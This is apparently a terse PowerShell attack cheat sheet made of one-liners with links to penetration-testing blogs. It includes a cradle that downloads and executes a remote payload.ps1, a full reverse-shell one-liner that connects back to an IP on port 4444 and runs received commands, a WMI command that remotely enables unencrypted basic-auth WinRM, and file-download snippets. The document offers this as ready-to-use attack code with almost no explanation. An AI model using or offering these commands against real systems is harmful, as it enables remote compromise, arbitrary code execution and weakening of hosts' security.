Powershell

C:\> powershell "IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.2/payload.ps1');"

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

$sm=(New-Object Net.Sockets.TCPClient("192.168.1.2",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

https://pentestn00b.wordpress.com/2016/08/22/powershell-psremoting-pwnage/

New-PSSession -ComputerName 192.168.0.2 -Credential hackme\admin
$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName remote-computer -Credential domain\user -ArgumentList $command

https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell

Invoke-WebRequest -Uri $url -OutFile $output
$url = "http://url.com/file"
$output = "$PSScriptRoot\file"

$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output

Start-BitsTransfer -Source $url -Destination $output -Asynchronous